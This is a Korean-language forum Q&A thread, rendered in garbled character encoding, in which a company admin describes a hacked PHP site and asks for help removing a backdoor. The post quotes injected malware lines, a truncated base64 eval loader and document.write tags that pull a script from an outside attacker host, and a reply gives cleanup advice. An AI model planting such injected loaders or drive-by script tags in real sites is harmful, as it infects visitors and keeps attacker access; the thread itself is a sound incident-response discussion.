Å©·¡Å· ÇÇÇØ

 423, 4/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   basscraft
   ¹éµµ¾î °ü·Ã ¹®ÀÇ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=473 [º¹»ç]


ȸ»ç¿¡¼­ È£½ºÆÃÇÏ°í ÀÖ´Â ¼­¹ö¿¡ ÇØÅ·À» ´çÇؼ­
¼Ò½º°¡ ¾û¸ÁÀÌ µÇ¾ú½À´Ï´Ù.

°ÅÀÇ 10³â ÀüÂë php·Î °³¹ßµÈ »çÀÌÆ®ÀÔ´Ï´Ù.
OS´Â ¸®´ª½º ÀÔ´Ï´Ù.

È®ÀÎÇØ º¸´Ï php ÆÄÀÏ ¸Ç óÀ½¿¡

<?php eval(base64_decode('aWYoIWZ1b... »ý·«...XSkpOw==')); ?>

ÀÌ·± ¼Ò½º°¡ ÀÎÁ§¼ÇµÇ¾î ÀÖ¾ú½À´Ï´Ù.
find ¸í·ÉÀ¸·Î 'eval(base64_decode(' ¹®ÀÚ¿­À» Æ÷ÇÔÇÑ ¼Ò½º¸¦ ã¾Æº¸¾Ò´õ´Ï
Æú´õº°·Î index.php ¶Ç´Â index*.php  µî ÆÄÀϵ鿡 ÀÎÁ§¼ÇµÇ¾î ÀÖ½À´Ï´Ù.

Ãß°¡·Î .js, .html ÆÄÀϵ鿡µµ

document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');
document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>')
;document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');

ÀÌ·± ³»¿ëµéÀÌ ÁÖÀԵǾî ÀÖ½À´Ï´Ù.
°ü¸®¸¦ Á¦´ë·Î ¸øÇÏ°í À־ ¼Ò½ºµµ ¹é¾÷ÀÌ ¾ÈµÈ »óÅ -0-;;;;
³ë°¡´Ù¶óµµ ÀÏÀÏÈ÷ ã¾Æ¼­ Áö¿ì¸é µÇ°ÚÁö¸¸

¹®Á¦´Â ÀÎÁ§¼ÇµÈ ¼Ò½ºÁß ÀϺδ Áß°£ºÎºÐ ÀÌÈÄ ¼Ò½º°¡ ¹¶ÅÖ Àß·Á¹ö¸° °ÍµéÀÌ Á¸ÀçÇؼ­
º¹±¸°¡ ºÒ°¡´ÉÇÑ »óÅÂÀÔ´Ï´Ù.(¿À·¡µÈ ¼Ò½º¸¦ ã¾Æ¼­ º¹±¸ÇÏ°í ÀÖ´ÂÁß...)
º¹±¸¸¦ ´Ù ÇÑ´Ù°í Çصµ ¹éµµ¾î °°Àº°Ô Á¸ÀçÇؼ­ ¶Ç´Ù½Ã µé¾î¿Ã °Í °°¾Æ¼­

¾î´À»çÀÌÆ®¿¡¼­ º» È®ÀÎ ¹æ¹ýÀ¸·Î È®ÀÎÇØ º¸´Ï

[aaa@xxx dev]$ find /dev -type f -exec ls -l {} \;
-rw-r--r--  1 root root 196608  2¿ù 27 04:47 /dev/.udev.tdb

ÀÌ·± °á°ú°¡ ÀÖ½À´Ï´Ù.
Àú°Ô ¹éµµ¾î ¸Â´ÂÁö...

´çÀå ´Ù½Ã ¼³Ä¡ÇÏ°í ½ÍÁö¸¸
ÀÏ´Ü À̹ø ¹®Á¦¸¸ ¾î¶»°Ô ³Ñ±â°í
»çÀÌÆ® ¸®´º¾óÀ» Çϱâ·Î ÀáÁ¤ ÇÕÀÇµÈ »óÅÂÀÔ´Ï´Ù.

Á¶¾ðÁ» ºÎŹµå¸³´Ï´Ù.

1. ÃßÃøµÇ´Â ÇØÅ·ÀÇ ¹æ¹ý
2. ÇØÅ·ÀÇ ¸ñÀû ¿¹»óµÇ´Â ÇÇÇØ(ȸ»ç ³», ¿ÜºÎ)
3. ¼Ò½º º¹±¸½Ã À¯ÀÇÇÒ Á¡
4. ¹éµµ¾î Á¦°Å ¹× ½Ã½ºÅÛ Á¤»óÈ­¿¡ ´ëÇÑ Á¶¾ð

Áú¹®ÀÌ ³Ê¹« ¸¹½À´Ï´Ù¸¸...
°³º° Ç׸ñÀÌ¶óµµ ´äº¯ÁÖ½Ã¸é º¹¹ÞÀ¸½Ç ²®´Ï´Ù ^^

  Hit : 4887     Date : 2010/03/03 10:00



    
¸Û¸Û 1. À§ Á¤º¸¸¸À¸·Î´Â ÃßÃøÇϱâ Èûµå³ª ÁÖ·Î À¥ÇØÅ·ÀÌ ¸¹½À´Ï´Ù. ÆÄÀÏÀÌ º¯°æµÈ ½Ã°£¿¡ ÇØ´çÇÏ´Â À¥ ·Î±×¸¦ ºÐ¼®ÇØ º¸¼¼¿ä.
2. Script°¡ »ðÀÔµÈ °ÍÀ¸·Î º¸¾Æ Ãß°¡ÀûÀÎ Client Àå¾Ç ½Ãµµ°¡ ¿¹»óµË´Ï´Ù. IE ºê¶ó¿ìÁ®À§ Ãë¾àÁ¡À»
ÀÌ¿ëÇÏ¿© À¥ »çÀÌÆ®¸¦ ¹æ¹®ÇÏ´Â ´Ù¸¥ Windows »ç¿ëÀÚµéÀ» Ãß°¡ Àå¾ÇÇÏ´Â °ÍÀ» ¸»ÇÕ´Ï´Ù.
3. eval ¿Ü¿¡µµ system, exec, passthru, popen ÇÔ¼ö ¶ÇÇÑ ¹éµµ¾î·Î »ç¿ë °¡´ÉÇÏ´Ï ÇÔ²² °Ë»öÇغ¸¼¼¿ä
4. Å©·¡Å·À» ¾ß±âÇÑ Ãë¾àÁ¡À» ãÁö ¸øÇÏ¸é º¹±¸ ÈÄ¿¡µµ Àç°¨¿° µÉ °¡´É¼ºÀÌ ³ô½À´Ï´Ù.
Script¸¦ ½É´Â ÆÐÅÏÀº ¿ú(ÀÚµ¿ °ø°Ý)¿¡ ÀÇÇÑ °ø°ÝÀÏ °¡´É¼ºÀÌ Å©±â ¶§¹®ÀÔ´Ï´Ù.
iptables¸¦ ÀÌ¿ëÇÑ ¹æÈ­º® Á¤Ã¥ ¼³Á¤ ¶ÇÇÑ °ø°Ý ¹æ¾î¿¡ µµ¿òÀÌ µÉ °ÍÀÔ´Ï´Ù.
(outbounding -¾È¿¡¼­ ¹ÛÀ¸·Î ³ª°¡´Â- ÆÐŶ Â÷´Ü µî)
5. ´äº¯ ¾È ÇÏ¸é º¹ ¸ø ¹Þ´Â°Ç°¡¿ä? ^^
2010/03/09  
363   ¹Ù¶÷Àdzª¶ó¿¡¼­¿ä[5]     godqhrwhddls
08/12 3315
362   ¹Ù¶÷Àdzª¶ó ´ëÇ¥ÀÛ....[10]     dlgmltjs2001
12/11 3752
361   ¹ÙÀÌ·¯½º¿¡ °¨¿°! µµ¿ÍÁÖ¼¼¿ä[5]     gloriahky
04/13 4032
360   ¹ÙÀÌ·¯½º¸¦ ¸¸µé°í ½ÍÁö¸¸..[3]     ssonacy
11/16 3885
359   ¹éµµ¾î ±ò·È¾î¿ä?¾î¶»°Ô Çؾߵdzª¿ä??[2]     joalove85
03/21 3638
  ¹éµµ¾î °ü·Ã ¹®ÀÇ[1]     basscraft
03/03 4886
357   ¹èÄ¡ÆÄÀÏ..[2]     skspc2
09/23 3653
356   ¸ÞÀÏ »çÀÌÆ® Á¢¼ÓÀÌ ¾ÈµË´Ï´Ù!!! ºÁÁÖ¼¼¿ä     lhb2082
10/09 3373
355   ¸¶ÀÌÄõ¸® ÇØÅ·     dlaudgkr
12/07 5456
354   ¸®¹ö½ºÅÚ³Ý ¿¡ °üÇÏ¿©[3]     youn5lee
03/23 4614
353   ¸®´ª½º·Î ´ëü À©µµ¿ì¶û ¼­¹ö¸¦ ¾î¶»°Ô ÇØÅ·ÇѴٴ°ÅÁÒ?[2]     kdc11111
11/06 3473
352   ¸®´ª½º°¡ ¸Á°¡Áø°Ç°¡¿ä..??¤Ð¤Ð     commio0
04/13 3144
351   ¸®´ª½º ½Ã½ºÅÛ ÇØÅ·À» ¹è¿ì°í½ÍÀº ÄÄ°ø2°³¿ù »õ³»±âÀÔ´Ï´Ù[9]     morieye
01/10 3401
350   ¸®´ª½º ¼³Ä¡ÇÒ¶§¿ä~!! Á¦¹ß ²ÀÁ»¾Ë·ÁÁÖ¼¼¿ä ¸®´ª½º ¼³Ä¡ÇÏ°í½Í¾î ¹ÌÄ¡°Ù½¿´Ù[2]     kdc11111
11/06 3304
349   ¸®´ª½º »èÁ¦Çߴµ¥ ºÎÆÃÀÌ ¾ÈµÅ¿ä Á¦¹ß µµ¿ÍÁÖ¼¼¿ä[1]     greenu
04/06 3895
348   ¸®´ª½º ¹× ±âŸµîµî Áú¹® 2°³¸¸¿ä ..!![4]     ¿ÀŹ
09/23 3980
347   ¸®´ª½º ¹é¾÷/º¹±¸ ¿ÀǼҽº amanda ¿¡´ëÇÏ¿©     goust99
09/27 5677
346   ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..     soarrr
06/26 4059
345   ¸í·ÉÇÁ·ÒÇÁÆ®¿¡¼­ Ãĺôµ¥¿ä[3]     gkswls123
11/04 4588
344   ¸í·É ÇÁ·ÒÇÁÆ®[1]     tkdahr
10/20 3554
[1][2][3] 4 [5][6][7][8][9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org